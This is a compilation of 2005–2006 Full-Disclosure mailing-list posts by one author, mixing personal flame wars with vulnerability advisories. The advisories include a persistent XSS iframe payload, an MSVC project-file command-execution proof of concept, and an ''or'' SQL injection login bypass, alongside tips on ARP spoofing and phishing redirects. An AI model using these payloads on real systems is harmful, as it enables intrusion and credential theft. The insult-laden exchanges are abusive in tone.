if you had a clue you would realize that the majority ( my guess is 98% ) of the
exploits on Milw0rm are not 0day, but are in fact released after vendor patches
are available. ( maybe str0ke could help with his guess on the percentage )

for those that are released without vendor patches,
they are generally due to the fact that the vendor is:
1. not contactable
2. non responsive to the researcher
3. ignorant

in cases 2 and 3 ( common ) the researcher releases them to HELP bring the
awareness to the vendor and users that foobar software is buggy and need be
either fixed by the vendor or removed by users and replaced by a better solution.


I suppose you would rather these float around only in the underground and
then you would have NO clue as to how you got pwn3d, possibly you should
have gotten into the offensive security side of things so you dont have to worry
instead of going for the classic defensive security position you obviously dread.


clue up!

MW



Re: [Full-disclosure] Amazon, MSN vulns and.. Yes, we know! Most sites have vulnerabilities

2006-06-24 Thread Morning Wood

I completely agree with the milw0rm point. The intent of my reply was to
remind MW that he too was a clueless one ( in recent times at that ) and
that he would be well served to spare others the abuse he got when he
was learning. The incivility of FD and the space in general is a bit tiring.


well, i may have to also agree that my choice phrasing was a bit... immature.
next time i will wait to reply after my 2 cups of coffee. ( thanks for
the deserved slap in the face Jason )

however, i still stand by the fact that full disclosure style of reporting
security flaws has prompted many vendors to be more diligent in fixing
issues and working with persons who discover vulnerabilities, as well
as doing more in-house testing and auditing.

further, IMHO, it is better to have exploit code publicly
available than solely being controlled and utilized by the blackhat
underground, which makes the internet an actual safer place for
everyone. ( see previous paragraph )

cheers,
mw




Re: [Full-disclosure] researchers want slice of profit and vow pull out of mailing list disclosures

2006-06-23 Thread Morning Wood

hi n3td3v
you boast that you are moderated to people saying that John Cartwright is 
on my side cuz he lets my posts through  hahahah what a JOKE

further, you really need to stop spamming me on YahooIM...

n3td3v: im about to deface zone-h
n3td3v: the joomla cms is full of vulns
n3td3v: u peice of shit
n3td3v: bye

yea, real mature there mr big international security boi 




Re: [Full-disclosure] researchers want slice of profit and vow pull out of mailing list disclosures

2006-06-23 Thread Morning Wood



This is what really happened...

mw: deface zone-h for me
n3td3v: why?
mw: cos i hate the new layout
n3td3v: lol
n3td3v: k give me the password to zone-h
mw: ok, hold on n3td3v
mw: e-mail sent, the password is in the e-mail
n3td3v: cool, thanks
n3td3v: lol, it works!
n3td3v: i thought you were joking me
mw: no probs n3td3v
mw: just remember, this conversation never happened k?
n3td3v: sure


here is the actual convo...

n3td3v : why did you post the i.m?
Morning Wood: just like your contryman Phill Collins says... true colors
n3td3v : hahahahahahaha... you know i.m's are easily forged
Morning Wood: yes bet we know its genuine, and i dont make up anything, 
thats the difference between us

n3td3v : i could post one as well saying you were going to deface zone-h too
Morning Wood: yea, you need lies
n3td3v : infact, i could post one saying you gave me exploit code to do it
n3td3v : mw: deface zone-h for me
n3td3v : n3td3v: why?
n3td3v : mw: cos i hate the new layout
n3td3v : n3td3v: lol
Morning Wood: funny, cuz im z-h staff and speak to Roberto daily
n3td3v : n3td3v: k give me the password to zone-h
Morning Wood: not to mention i showed him that when you im'd it
n3td3v : mw: ok, hold on n3td3v
n3td3v : mw: e-mail sent, the password is in the e-mail
n3td3v : n3td3v: cool, thanks
n3td3v : n3td3v: lol, it works!
n3td3v : n3td3v: i thought you were joking me
n3td3v : mw: no probs n3td3v
n3td3v : mw: just remember, this conversation never happened k?
n3td3v : n3td3v: sure


now plz go away



[Full-disclosure] microsoft france attack details

2006-06-19 Thread Morning Wood
Zone-h has had an interview with the cracker who defaced 
http://experts.microsoft.fr and details the method of attack. 0day or 
corporate ignorance?


Full story:
http://www.zone-h.org/content/view/4770/31/


Donnie Werner
http://zone-h.org
http://exploitlabs.com



[Full-disclosure] Microsoft-fr defaced

2006-06-18 Thread Morning Wood

Microsoft France was defaced today by Turkish hackers.
http://experts.microsoft.fr/default.aspx

a story and a mirror of the defacement are available on Zone-h

story:   http://www.zone-h.org/component/option,com_frontpage/Itemid,1/
mirror: http://www.zone-h.org/index2.php?option=com_mirrorwrpid=4181592


Donnie Werner
http://zone-h.org



Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

2006-06-10 Thread Morning Wood

Dick, err Bill,
odd product you have...
anything i tried to run via GreenBorder simply, how do I say this... DID NOT 
RUN PERIOD.


I am amazed at the effectiveness of your product, it's great! I was fully
protected from not being able to do anything at all with your product,
simply amazing. When I tried to run Internet Explorer, it simply would not
run!!! I was obviously fully protected from all threats, again Dick, err
Bill, big props to your Product! Now, being one that just has to back up my
security product research, I uninstalled your product to compare my computer
use and Internet browsing without your Product's protection. After a reboot
I see now that my HTML icons are now back with that blue e, not that BIG
GREEN SQUARE THINGIE, ( an obvious sign of not being protected ) although I
can actually open them now, as well Internet Explorer itself now opens ( I
think I'm at risk now huh? )  In my opinion this Product is effective, or
not, depending on your Marketing stance and spamming of security lists
touting a questionable product, that offers nothing that I can see of value.


cheers,
MW 




[Full-disclosure] ASPListPics

2006-06-09 Thread Morning Wood

- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 -

 - ASPListpics -




RETRO-RELEASE DATE:
===================
Nov 11, 2004

Duplicate Release: June 06, 2006
by: r0t
http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html
http://secunia.com/advisories/20517/


OVERVIEW
========
ASPListpics is a highly configurable ASP application that automatically
generates fast thumbnail web indexes of images in a folder structure.



AFFECTED PRODUCTS
=================
ASPListpics 4.x
http://www.iisworks.com



DETAILS
=======
1. XSS ( persistent )



PROOF OF CONCEPT LINKS AND RETRO-POC
====================================
1. XSS ( Cross Site Scripting )

There is persistent XSS inclusion in the comments
feature of ASPListpics in the following:

field name
field comment

By embedding various types of XSS into the comment
section, we are able to render javascript in the
user's browser.

below is a simple PoC ( Proof of Concept )

enter into the comments section malicious script.
comment: ohnoiframe src=http://whatismyip.com;/iframeouch

and is rendered as:
HTTP://[VUNERABLEHOST]/listpics/listpics.asp?a=rateID=[PICID]Info= 
SCRIPTING HERE 9000|0




CREDITS
=======
r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html



RETRO-CREDITS
=============
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs. At the original time
of discovery and retro-release date, the author was
not aware of any other advisories or patches available.

Retro-Advisories are released when either the same research
is released by a 3rd party, old private research that is no longer
active, or the product has been patched due to Vendor updates
before a formal Exploitlabs advisory was released to the public.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com



Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-16 Thread Morning Wood

Pentagon Crash Footage released today

http://www.judicialwatch.org/flight77.shtml



Re: [Full-disclosure] **LosseChange::Debunk it??**

2006-05-10 Thread Morning Wood
the only fact worth investigating in this is the sales of stocks leading
up to 911.
viewed from a technical standpoint on the pentagon attack and the towers
collapse... well this is just pure bullshit. anyone with basic physics and
any amount of aviation experience can see the author is absolutely clueless in
regards to these technical points.


my2bits,
MW 




Re: [Full-disclosure] MSIE (mshtml.dll) OBJECT tag vulnerability

2006-04-26 Thread Morning Wood

Your blog seems to suggest that you are also quite severely mistaken in
regard to my identity.

 Secunia did not notify Microsoft ahead of time in order to allow for
 them to patch it before it became public. [...] Microsoft chided
 Zalewski [from Secunia] for jumping the gun and posting his findings
 before a comprehensive patch could be created, but the researcher is
 unapologetic.

But that's for you to figure out what's wrong in that picture.


I will take a shot in the dark here... you do not work for Secunia.
and yes... bad blogging is far worse than any 0day, it does nothing but provide
inaccurate information, hysteria and FUD.
Tim... next time you decide to try to write a comprehensive blog entry, do some
research first. ( and stop relying on the footer to try to decipher who
someone is or not )


Secunia sponsors the FD list, and is not the releasing entity in this case.

DAMN THE BLOGGERS!!!

cheers,
MW



Re: [Full-disclosure] Internet Explorer User Interface Races, Redeux

2006-04-26 Thread Morning Wood

Game's up, n3td3v.  You can quit hiding behind your fake Yahoo account
now.  Go away kid, before you hurt somebody.


owned!



Re: [Full-disclosure] Secunia illegal spam and advisory republication

2006-04-20 Thread Morning Wood

When you subscribe at grok.org.uk, you are not made aware that
Secunia is affiliated with the mailing list and fails to warn users that
a Secunia URL will be placed at the bottom of a user or company disclosure.


what you fail to see is... we don't care.
Further, any information a researcher discloses in public is just that, public.
Since you are hellbent on leather here... your oh so loved Securityfocus / Bugtraq
does the same thing. Many of my own advisories are put on Bugtraq without me
submitting directly. I guess http://www.osvdb.org is just as guilty? Perhaps
Milw0rm too?


You are mad because you have never once had any information disseminated by
any security site, why? Cuz you dont do any research, find vulns, write
exploits or have disclosed anything worthy of publication. Further, because
of your continued drunken rants, lack of professionalism and just plain
stupidity you never will be a player in the security industry. You fail
to see that these faults are yours, and yours alone.


As I have said before... get sober, stfu and get a real life.  We here ( and
the big media you are trying desperately to attract ) don't give a
rats ass about you, your drunken megalomaniacal disposition, or anything you
do... PERIOD.


stfu kthnx bai,

MW






Re: [Full-disclosure] Secunia illegal spam and advisory republication

2006-04-20 Thread Morning Wood

No, Milw0rm tells you who discovered the vulnerability, as do other
sites. Although Secunia tell you it was all their work. I bet you
would be pretty pissed if you post one of your XSS or SQL injection,
and it appears on the Secunia website the next day saying Secunia
FOUND. 


WRONG WRONG WRONG

you cant even backup your rant with facts can you?

http://secunia.com/search/?search=Donnie+Werner

THANKS FOR PLAYING !!!



Re: [Full-disclosure] Secunia illegal spam and advisory republication

2006-04-20 Thread Morning Wood

You think? I have setup a webpage to tell you what I think of you and
everyone else. http://geocities.com/n3td3v who doubts me. One time I
added you to Yahoo Messenger thinking you were a friend but you just
walk all over me like everyone else. Screw you man


thats right, YOU added me ( i never was your friend ) and I tried to
warn you about yourself, your drunkenness, and your skewed outlook
on life.

I think it's funny after I showed you were wrong about Secunia,
you now go off on some other rant and roll. ( drop some more eX ok ).
Instead you point to some extremely idiotic page that itself shows just how
lame you are, your delusions of grandeur and the fact that you just plain suck.


Stop thinking people are your friends, and actually try to find a friend
( if they can put up with your paranoid drunk ass that is )


You say you're someone elite, but all you've done is XSS and SQL
injection (copy and paste hacking). Anyway, read the webpage hotshot.


I may not have produced the most ground breaking exploits and vulns,
but I have something you will never attain, and that is RESPECT.

I seriously suggest attacking someone who cant think for themselves,
dont have a clue, and are within your own peer group
( preschool - kindergarten )

 cheers,
MW 




Re: [Full-disclosure] Secunia illegal spam and advisory republication

2006-04-20 Thread Morning Wood

Correction: You have never attained respect from anyone.


since you are a bantown troll, I will just disregard you

bai



Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

2006-04-18 Thread Morning Wood

Yahoo! Mail once in a while will ask you
to re login again so it's not so abnormal.


I use Yahoo Mail, I have never once had to re-login in 4 years.

dunno...



Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

2006-04-17 Thread Morning Wood

exploit creates a frameset and redirects to
http://w00tynetwork.com/x/ ,it's interesting that the


redirects to http://211.22.14.50/.yahoomail/x.htm and spoofs a Yahoo login page.
upon entering credentials, the site redirects back to http://mail.yahoo.com
so it simply looks like a bad login.


211.22.14.50 = www.gbigift.com.tw

cheers,
mw 




Re: [Full-disclosure] [Argeniss] Alert - Yahoo! Webmail XSS

2006-04-17 Thread Morning Wood

reflecting on this...

the offending url you give is http://w00tynetwork.com/x/
which contains a fake yahoo login ( for webmail )
(( and other exploits embedded within the site ))


you state this is a Yahoo Email vulnerability.

stop me if im wrong...
why would anyone be vulnerable to a Yahoo login redirect phish, if in fact
they are already logged in to read the mail in the first place.


i can appreciate the possibility of XSS within the Yahoo webmail interface, just not
with this particular redirect code ( or site url ) you provide.

XSS could be more effectively used to leverage a browser exploit, rather than ( trying to )
steal your credentials ala phishing

2cents,
MW 




Re: [Full-disclosure] Industry calls on Microsoft to scrap PatchTuesday for Critical flaws

2006-03-28 Thread Morning Wood


- Original Message - 

From: n3td3v [EMAIL PROTECTED]
The problem here is, many of the n3td3v bashers are secretly blackhat trolls
(like morning wood etc) and don't add to the discussion of eEye and others


ex-fucking-scuse me? grow up you drunk idiot. 




Re: [Full-disclosure] Industry calls on Microsoft to scrap PatchTuesday for Critical flaws

2006-03-25 Thread Morning Wood

Sorry to say the n3td3v group
more like Sorry to say n3td3v group does not exist ( kinda like your brain )


umm, there is no n3td3v group
so please stop using that phrase, you're just trying to make yourself look
big and professional to the media / vendor personage that reads this list.


.. and that you have a group of rogue employees ( trying to make like
there are bonafide sec researchers working for your group )  [ insert much
lmfao here ]


n3td3v... you are chum, bait, food, just waiting to be extruded out of some 
orifice like the smelly nasty mess you are.


NOW PLZ STFU KTHNX 




Re: [Full-disclosure] Re: Arin.net XSS

2006-03-06 Thread Morning Wood



same issue that internic had a few years ago..
http://lists.grok.org.uk/pipermail/full-disclosure/2003-May/005092.html

cheers

Re: [Full-disclosure] Filemaker Pro 7 - any known exploits/hacks available?

2006-01-31 Thread Morning Wood

- Original Message - 
From: Knud Erik Højgaard [EMAIL PROTECTED]
Pay me for an audit (I will find a bug and give you ammo to say NO),
or hire a(n expensive) company like corest/ilja,suresec(not
expensive)/eeye/lsd.pl/immunitysec(hi dave)/phenoelit(hi FX) to do the
same. I am probably cheaper, they are probably(yeah right, they
certainly are) better.
--
Knud

hard up for 0days are ya Kokanin?


Re: [Full-disclosure] MBT Xss vulnerability

2006-01-20 Thread Morning Wood



in all honesty, XSS is a serious vector of attack.
however, non-persistent XSS is a much less serious problem
than is persistent XSS. Generally XSS is of no harm to the server
side anyway. It can however be leveraged as the OP said, but
would require a dedicated, pre-formed url string that needs to
be presented to the user to be effective. IMHO the OP advisory
should not have been posted, because of the non-persistent nature
of the flaw at one dedicated site.

Issues come into play via persistent XSS, which is script that may
be embedded in a web application, such as a guestbook, or comment
section, where people would travel to on their own without the need of
a direct link and then rendered upon visitation in the user's browser.
Further, in today's world of browser exploitation, cookie, session,
and/or credential theft is not the only thing to be gained and is often
of minor importance and information. What is bad is leveraging XSS
as a vector for browser exploitation ( can we say IFRAME+WMF ),
so you have a way, via XSS to COMPROMISE end users systems.

While the OP does have a valid initial point and theory,
1. it is not persistent in nature
2. it is one site, and not a script used on many sites
3. it does require SE at some level to be effective
4. it should not have been posted to FD ( see points 1,2,3 )


my2bits,
MW


Re: [Full-disclosure] Security Bug in MSVC

2006-01-19 Thread Morning Wood
 What's the point of building a bunch of sources unless
 1. you trust their author, or
 2. you have made sure there is nothing malicious there?
 
 When you build an executable from untrusted sources, you get an untrusted
 executable. Either you run it and you're screwed anyway, or you don't run
 it and you wasted your time building it.
 

again...

this does not exploit the source code.
it does exploit the build files.

if i was simply compiling badprog.c
then launching it, that would be stupid.

i am leveraging the project files, not the source code.

MW


Re: [Full-disclosure] Security Bug in MSVC

2006-01-18 Thread Morning Wood
 In all this, I am discounting the fact that if someone is building
 untrusted sources, (s)he is most likely going to run the untrusted
 program afterwards.

this does not run an untrusted program.
if you noted, I named it a feature bug
and my poc is a simple hello world sample

Judging from MS extensive information to me, direct from MSRC, this is an
issue.
remote code can be pulled in and executed without any
notice or warning to the user.
I am not leveraging directives for CPP ( cc is the Makefile equiv )

MSVC tends to hide ( especially these actions ) to the end user.

cheers,
Donnie


Re: [Full-disclosure] PC Firewall Choices

2006-01-17 Thread Morning Wood
 I am looking at supplementing the Windows XP (Pro) SP2 Firewall with a third
 party product on a bunch of Windows machines.

not to plug a product, but
http://force.coresecurity.com/

I have received many kudos after recommending this to several people.

my2bits,
MW


[Full-disclosure] Security Bug in MSVC

2006-01-17 Thread Morning Wood

 - EXPL-A-2006-002 exploitlabs.com Advisory 048 -


  - MSVC 6.0 run file bug -




AFFECTED PRODUCTS
=================
Microsoft Visual Studio 6.0
http://microsoft.com

Possibly other products referenced in:
http://support.microsoft.com/kb/841189



OVERVIEW
========
Source code project distributions are very popular these days.
Generally authors offer code as a project with source, headers,
and msvc project files if it is a fairly big project. Most users
will simply open up the project.dsw file, ( especially if it says
to do so in a readme.txt or other compiler instructions ) which
in turn loads the project.dsp files, which provides the compiler
directives.
A malicious attacker could embed commands to be executed in the
project files, and execute any local code of his choosing.

note: this is an implemented feature in MSVC, and should be
considered a bug, not a vulnerability.



IMPACT
======
The impact of this is quite severe, as it is possible to script
commands such as to launch ftp, retrieve and execute a file from
a remote location.




DETAILS
=======
By modifying the .dsp files:

project
settings
custom build
Commands: command to execute
Post-build Step: command to execute


1.a

InputPath=.\Release\hello.exe
SOURCE=$(InputPath)

hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR)
 calc

1.b

PostBuild_Cmds=notepad.exe



POC
===
http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip

extract, and open hello.dsw
click batch build, build or rebuild all
code will execute ( calc.exe and notepad.exe used as an example )
calc.exe = Custom-Build
notepad.exe = PostBuild Commands



SOLUTION
========
vendor contact:
[EMAIL PROTECTED] Sept 20, 2005
http://support.microsoft.com/kb/841189 updated Jan 6, 2006

Microsoft provided these URL's as well:
http://msdn.microsoft.com/library/en-us/vsintro7/html/vxurfopenprojectfromwebdialogbox.asp
http://msdn2.microsoft.com/en-us/library/bs2bkwxc.aspx




SUGGESTED PATCH
===============
Include a dialog box that warns the user, before pre and post
build directives can be launched, if the presence of execute
directives exist in the build project files.




CREDITS
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs


mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://exploitlabs.com/files/advisories/EXPL-A-2006-002-msvc-featurebug.txt
http://exploitlabs.com/files/advisories/msvc-featurebug-POC.zip
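
The warning proposed under SUGGESTED PATCH can be approximated outside the IDE by scanning a project file before it is opened and built. This is an added example in Python, not part of the advisory or of any Microsoft tool; scan_dsp, build_warning and the sample project text are hypothetical, and the parser only recognises the two constructs shown under DETAILS (a rule followed by indented commands, and a Name_Cmds= directive).

```python
"""Pre-build check for Visual C++ 6.0 .dsp project text: list every command
the project would run during a build, so it can be reviewed first."""
import re
import sys
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int   # 1-based line in the project file
    kind: str      # directive name, or "custom-build" for a rule command
    command: str


# Build-step directives of the form Name_Cmds=command (PostBuild_Cmds on the page).
CMDS_KEY = re.compile(r"^(\w+_Cmds)=(.*)$", re.IGNORECASE)
# Make-style rule header as in the advisory: "target : dependencies".
RULE_HEADER = re.compile(r"^[^\s#!].*\s:(\s|$)")

# Constructed sample, modelled on sections 1.a and 1.b of the advisory.
SAMPLE_DSP = (
    "# Microsoft Developer Studio Project File - constructed sample\r\n"
    "# PROP Output_Dir \"Release\"\r\n"
    "SOURCE=.\\hello.cpp\r\n"
    "InputPath=.\\Release\\hello.exe\r\n"
    "SOURCE=$(InputPath)\r\n"
    "\r\n"
    "hello.exe : $(SOURCE) $(INTDIR) $(OUTDIR)\r\n"
    "\tcalc\r\n"
    "\r\n"
    "PostBuild_Cmds=notepad.exe\r\n"
)


def scan_dsp(text: str) -> List[Finding]:
    """Return every command a build of this project text would execute."""
    findings: List[Finding] = []
    in_rule = False
    for line_no, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped:
            continue  # blank lines neither start nor end a rule body
        if in_rule and line[0] in " \t":
            # Indented line under a rule header: a custom build command.
            findings.append(Finding(line_no, "custom-build", stripped))
            continue
        in_rule = False
        key = CMDS_KEY.match(stripped)
        if key:
            if key.group(2).strip():
                findings.append(
                    Finding(line_no, key.group(1), key.group(2).strip()))
        elif RULE_HEADER.match(line):
            in_rule = True
    return findings


def build_warning(path: str, findings: List[Finding]) -> str:
    """Text for the confirmation prompt; empty when nothing would run."""
    if not findings:
        return ""
    lines = [f"{path}: building this project will run "
             f"{len(findings)} command(s):"]
    lines += [f"  line {f.line_no} [{f.kind}] {f.command}" for f in findings]
    return "\n".join(lines)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="latin-1") as handle:
            name, content = sys.argv[1], handle.read()
    else:
        name, content = "sample.dsp", SAMPLE_DSP
    message = build_warning(name, scan_dsp(content))
    if message:
        print(message)
        sys.exit(1)  # non-zero so a wrapper script can refuse to build
```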


[Full-disclosure] AspTopSites SQL injection

2006-01-10 Thread Morning Wood

- EXPL-A-2006-001 exploitlabs.com Advisory 047 -

 - AspTopSites -






AFFECTED PRODUCTS
=================
AspTopSites
http://www.maine-net.com/aspts.asp



OVERVIEW
========
AspTopSites® runs on your Windows NT/2K/2003 Server
 and uses Active Server Pages with a MS Access 2000 database.
 Simply upload AspTopSites®, make one configuration setting
 and you're ready to start running your own TopSites traffic
 generator.  AspTopSites® comes with full source code...
 no encoding or DLLs need to be installed on the server.





DETAILS
===
1. SQL Injection

AspTopSites does not filter SQL resulting in
full access to the user manager menu.




POC
===

1.
---

entering SQL Injection type statement in the password field
causes the statement to be true.

http://[host]/topsites/default.asp --- view listings
http://[host]/topsites/goto.asp?id=43 --- mouseover id value
http://[host]/topsites/includeloginuser.asp --- login here
user: [ id value ]
password: 'or'


note: Vendor Demo Site is Vuln



SOLUTION:
=
vendor contact:
Jan  3, 2006 [EMAIL PROTECTED] ( no resp )
Jan 10, 2006 ( no resp = release )



Credits
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs

Donnie Werner

mail:   wood at exploitlabs.com
mail:   morning_wood at zone-h.org
-- 
web: http://exploitlabs.com
web: http://zone-h.org

http://www.exploitlabs.com/files/advisories/EXPL-A-2006-001-asptopsites.txt


Re: [Full-disclosure] How to Determine My System Vulnerabilities

2006-01-10 Thread Morning Wood
  I know I feel like the Federal Reserve is safe now.

well..., the headers appear to be genuine
IS THIS FOR F*CKING REAL 

The director for IT of the FDRB of Minneapolis is asking the most basic
question possible. ARE YOU SERIOUS?!?!?


I have three servers running Linux Red Hat OS.  I would like to find a
source for information regarding How Too when it comes to determining
what level of kernel, SSH, PHP, etc. my servers are running.  I do know how
to check some of these things but am looking for someone who is very
knowledgeable and is willing to answer questions about this OS.

HOW DID YOU EVEN GET THE JOB???

I BET YOU TOOK A TEST AND HAVE SOME BIG FANCY LETTERS *sigh*

this ignat is making what? 75-125k$ / yr and dont know
how to get versions from his daemons?!?!  wtf wtf wtf omg omg omg

*shocked and awed*
/me falls over


Re: [Full-disclosure] Re: SecurID with Active Directory ?

2006-01-10 Thread Morning Wood
 [If, for instance, you really need to completely eliminate access via
 passwords, you could use some programmatic method (i.e., Visual Basic) to
 set your users' Windows passwords to very long, random passwords that
 never expire. The password change would be captured on the DC and sent to
 the ACE/Server. The long, random passwords would then be
 provided with each authentication (and recovered when offline), but the

 I believe you mean a custom VB login.exe at every user station?

 users will never know their Windows password.

unless of course they take the time to look in the custom vb login.exe
application, where the user/pass is stored in clear text. This would also
be a point of attack if the exe were ever to escape outside infrastructure
controls. ( I bring this up as this exact vector was used successfully in a
pentest, the exe asked for a user/pass, the application then allowed access
to the ftp server and its credentials were stored cleartext in the exe. The
developer believed he could hide the actual ftp process from the end user so
they did not need to set up user accounts on the ftp server and using the
exe to validate against an asp server, thus allowing the application to
validate and run. )

although not quite the scenario you describe, i believe the implications
would be the same.
of course, I could be completely off base

MW


Re: [Full-disclosure] Re: what we REALLY learned from WMF

2006-01-06 Thread Morning Wood
 I do know that MS prefers to do extensive testing on patches.
ms04-015 , i was told, had to go through over 200 differing
infrastructure / product / implementation testings before release.
i am sure some of these tests are done for large corps to ensure
no breakage across a multitude of architectures, etc. A patch
may work properly on 99% of everything, but its that 1% they
focus on before formal release. ( esp if that is a large enterprise )

my2bits,
MW


Re: [Full-disclosure] Unofficial Microsoft patches help hackers, not security

2006-01-04 Thread Morning Wood
 everyone knows the best official patch is firefox
 
umm, no
firefox presents a save or open dialog box.
if the user believes it to be an image he / she is
intended to view, they will simply open.
thus, windows gladly passes the extension
handler to WMF, game over.
or, they will save and simply passing the
mouse over the icon will trigger the exploit,
again... game over


Re: [Full-disclosure] Trojan found on Linux server

2006-01-02 Thread Morning Wood
 Yep, when running strings on it I noticed a few IP addresses 
 (219.133.46.212, 61.211.239.84, 64.239.9.236) in there as well as 
 commands indicative of IRC (NOTICE, NICK, PRIVMSG, etc.)

64.239.9.236 = copticpope.tv
http://64.239.9.236/  http://copticpope.tv heh?
















Re: [Full-disclosure] new attack technique? usingJavaScript+XML+OWSPost Data

2005-12-22 Thread Morning Wood
Gaurav,
 go back to using Cain to spy on your co-workers for your corrupt boss.
and btw, you dont hack servers then go to the company to ask for a tender
to provide security services ( its called blackmail, but I guess that pretty
common in Hyderabad ). Have a nice life backstabber!

cheers,
MW


Re: [Full-disclosure] XSS vulnerabilities in Google.com

2005-12-21 Thread Morning Wood



i see no "n3td3v" credits here... further, i cant conceive of the fact
that you would even know what UTF-7 encoding is.
IMO all you have ever done is notice weird behavior when info is pulled
into your Google group ( like your 1st post about google groups about 9
months ago or so ) from other sources ( or replies ). XSS can be bad or
benign depending on if it is persistent in nature or not ( if not it
requires a user to click a preformed XSS url ). And yes, persistent XSS
can be used to root users if coupled with the latest browser exploit
( and any admin behind the sites firewall / corporate infrastructure ).
In the future may I suggest the following

1. find your flaw
2. write an advisory
3. send it to the vendor
4. wait for response
5. wait for patches
6. disclose advisory formally
7. stfu and find your next flaw

cheers,
mw




  
  
  //= Security Advisory =//

  XSS vulnerabilities in Google.com

  --[ Author: Yair Amit, Watchfire Corporation http://www.watchfire.com
  --[ Discovery Date: 15/11/2005
  --[ Initial Vendor Response: 15/11/2005
  --[ Issue solved: 01/12/2005
  --[ Website: www.google.com
  --[ Severity: High
  

Re: [Full-disclosure] BANTOWN PRESENTS: Give me 0day or give me death

2005-12-18 Thread Morning Wood



troll go home
http://www.encyclopediadramatica.com/index.php/Bantown

i think we can all see the seriousness of this OP ( not )

and next time... tell your cronies IP-Relay phone is traceable,
not to mention against the law to make harassing calls over its
service

happy holidays ( i bet your bbq sauce is frozen about this time of the year )

mw


Re: [Full-disclosure] [scip_Advisory] NetGear RP114 Flooding Denial ofService

2005-12-12 Thread Morning Wood
dunno, but i know this has been an issue since the rt314 product
( 1999-2000? )
a simple nmap -sS target triggers it external, and no surprise internal as
well.
( not fun running pentests behind one of these babies )
i dont know if you noticed that existing connections dont appear to be
affected ( IM and streaming traffic ) but dns generally gets hosed.

my2bits,
Donnie Werner
http://exploitlabs.com



Re: [Full-disclosure] Fuzzing testing webapp?

2005-12-11 Thread Morning Wood
I want to do something like this with a script, tool etc, (Looking fuzzing
directory traversal )
http://target/any.asp?data=.../.../.../ -
where the variable data=  -- this  i want to test to found some bugs
http://target/cgi-bin/any.cgi?data=var1var2;


efuzz is good in windows, and has exactly what you want ( although you can
only fuzz one var )
http://www.priestmaster.org/projects/tools/efuzz.zip
( i have found stack overflows with this )

others are avail, such as Peach and Fuzzy, but are python based ( and
work quite well )

the secret Google search string is:
http://www.google.com/search?hl=enq=fuzzer

cheers,
mw


Re: [Full-disclosure] Famous n3td3v quotes - The Director's Cut(outnow on DVD)

2005-12-11 Thread Morning Wood
When you're able to ask an employee at a major dot-com to implement
http://security.yahoo.com and they do it, come back to me.

you're fucking serious? http://security.yahoo.com/  --- basic security info.
no major dot-com is stupid enough to NOT follow those recommendations,
not to mention it is consumer level advice ( and common sense ). You
have seriously outdone yourself here, and blown your cover of being a
real security researcher.
Please take your drunk, UK megalomaniacal ass and go put a broom in it.
( or just STFU )
unless you can present your formal advisories ( since the flaws are patched,
there is no disclosure worry )
to this list, anything you say is hearsay, and thus not believed. sooo
next time you save us all from death of the interweb, please be kind enough
to back it up with some actual facts so we all can thank you, and realize
just how lucky we are to have you in our hearts ( and search engines ).

the interweb thanks you,
mw



Re: [Full-disclosure] Re: Google is vulnerable from XSS attack

2005-12-07 Thread Morning Wood
As a owner of a Google Group, I would personally like this patched for
the security of my group and that of my personal computer and web
browser.

hmm... did you pay for this group? didn't think so
read the eula? bet not
who owns you? hint: Google ( they own the world )


Re: [Full-disclosure] Fwd: Report to Recipient(s)

2005-11-30 Thread Morning Wood

  Only those with broken AV software, since that line is not the EICAR
test
  string, according to the definition of the EICAR test string.

 As many have pointed out, I realize it's supposed to be an attachment :

 http://www.eicar.org/anti_virus_test_file.htm


you would be surprised at all the infected returns this generated when sent

http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0919.html
http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/0923.html

( note the : This was a text only message with NAMES only. )


Re: [Full-disclosure] Paypal phishing attempt

2005-11-29 Thread Morning Wood
Someone with more time than me please report the following scam:
http://210.202.161.99/us/Account_verification/webscr-cmd=_login/

for sites outside the usa, it is futile to contact ebay about every site.
the best thing is to contact the offending server / hosting / isp


Re: [OTO-54919]: Re: [Full-disclosure] Paypal phishing attempt]

2005-11-29 Thread Morning Wood
 Wtf?

 I wasn't aware I needed a ticket created ... is everyone else getting
these?

yes, I think it is tied to an autoresponse email account here on the list
( and very stupid IMHO )


Re: [Full-Disclosure] Return of the Phrack High Council

2005-11-28 Thread Morning Wood
oops?

Database error: pconnect(209.173.128.195, snappoll, $Password) failed.
MySQL Error: ()
Session halted.

http://snappoll.com/poll/50150.php



Re: [Full-Disclosure] Return of the Phrack High Council

2005-11-28 Thread Morning Wood
hmm, second time vote worked... but um


http://www.snappoll.com/view_results.php?poll_id='50150

Database error: Invalid SQL: SELECT * FROM polls WHERE poll_id='50150
MySQL Error: 1064 (You have an error in your SQL syntax near ''50150' at
line 1)
Session halted.

eek


Re: [Full-disclosure] How do you sniff your LAN subnet in nowdaysswitched networks ?

2005-11-26 Thread Morning Wood
 If you have access to a machine connected to the switch you could try 
 arp-spoofing ( http://en.wikipedia.org/wiki/ARP_spoofing )and redirect 
 traffic to this machine and sniff it there.
 
 More Info:
 http://wiki.ethereal.com/CaptureSetup/Ethernet?action=show
 http://su2.info/doc/arpspoof.php


he might be running Windows.
get cain http://oxid.it  
arp spoof then sniff while your routing packets

cheers


Re: [Full-disclosure] Hacking Boot camps!

2005-11-22 Thread Morning Wood
Interesting about the Intense thing... ( sorry for your loss )

Blackhat training camps sound pretty good and some of the people are
